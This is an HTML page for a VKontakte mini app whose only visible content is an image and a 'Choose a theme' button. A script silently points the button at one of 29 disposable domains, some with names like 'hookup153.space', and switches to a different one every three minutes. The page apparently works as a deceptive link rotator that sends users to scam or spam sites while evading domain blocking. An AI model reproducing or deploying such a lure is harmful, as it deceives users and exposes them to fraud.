<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width,initial-scale=1" />
        <meta name="theme-color" content="#000000" />
        <title>new</title>
        <link href="style.css" rel="stylesheet" />
    </head>
    <body style="overflow: hidden;">
        <div id="root">
            <section class="View View--ios View--header">
                <div class="View__header">
                    <div class="View__header-scrolltop"></div>
                    <div class="PanelHeader PanelHeader--ios">
                        <div class="PanelHeader__in PanelHeader__in--active" id="panel-header-main">
                            <div class="PanelHeader__container">
                                <div class="PanelHeader__left">
                                    <div class="PanelHeader__left-in" id="header-left-main"></div>
                                    <div class="PanelHeader__addon" id="header-addon-main"></div>
                                </div>
                                <div class="PanelHeader__content" id="header-title-main"></div>
                                <div class="PanelHeader__right" id="header-right-main"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="View__panels">
                    <div class="View__panel View__panel--active">
                        <div class="View__panel-in">
                            <div id="main" class="Panel Panel--ios">
                                <div class="Panel__in">
                                    <div class="Panel__in-before"></div>
                                    <div style="display: flex; align-items: center; flex-direction: column; justify-content: center; height: 80vh;">
                                        <img src="https://i.imgur.com/0WyNQaP.png" style="width: 80vw; margin-bottom: 10px; border-radius: 10px;" />
                                        <a href="#" role="button" class="Tappable Tappable--ios Button Button--ios Button--sz-xl Button--lvl-primary Button--aln-center Tappable--inactive" style="width: 80vw; cursor:pointer;" target="_blank">
                                            <div class="Button__in"><div class="Button__content">Выбрать тему</div></div>
                                        </a>
                                    </div>
                                    <div class="Panel__in-after"></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <script src="https://unpkg.com/@vkontakte/vk-bridge/dist/browser.min.js"></script>
        <script>
            // Sends event to client
            vkBridge.send('VKWebAppInit');
        </script> 
        <script>
            const url_list = ['http://branny.hookup153.space/un5ZZ', 'http://scaly.hookup154.space/KN1geJz', 'http://atticism.kukushka.space/VfS2a2', 'http://conciseness.whysmall.space/pzYuwBr', 'http://elegance.rat-red.space/nbG2i', 'http://whemmle.morj.space/0ptBv', 'http://disorder.apple-fruit.space/wFBzs', 'http://state.vnds-super.space/dEQR9V', 'http://throw.hurricane1.space/h6r1CIQ', 'http://overturn.extraterrestrials.space/zVOMty', 'http://supplement.womenit.space/ApsV6Nk', 'http://paralipomenon.yogait.space/C7uyqS', 'http://relics.healsmall.space/J9QHhf', 'http://funeral.itanah.space/WnuXH', 'http://bier.itprod.space/R4vkb', 'http://shrine.macsk.space/x6nUJn0', 'http://relics.itwomen.space/e8iVz', 'http://hotels.girlita.space/V70ok8', 'http://xenodocheionology.romeita.space/lRjZBm', 'http://mundungus.women-ita.space/lSNCc', 'http://tobacco.opit.space/4bcYUH', 'http://foul.geniusenglish.space/FHl7SRK', 'http://malinger.miniapp-x782-9.space/hvNaN', 'http://sickness.yoga-italy.space/MGI653S', 'http://work.matroskin.space/HcvrIf', 'http://prime.tovelksa.website/2vs4BM', 'http://oppresses.narurals-green.space/X4h8d', 'http://liable.slardar.fun/Vluer', 'http://rather.vvinorama.website/Fstdiut']
            const url_index = Math.floor(Math.floor(Date.now() / 1000) / (3*60)) % url_list.length
            const url = url_list[url_index]
            document.querySelector('.Tappable').href = url
        </script>
    </body>
</html>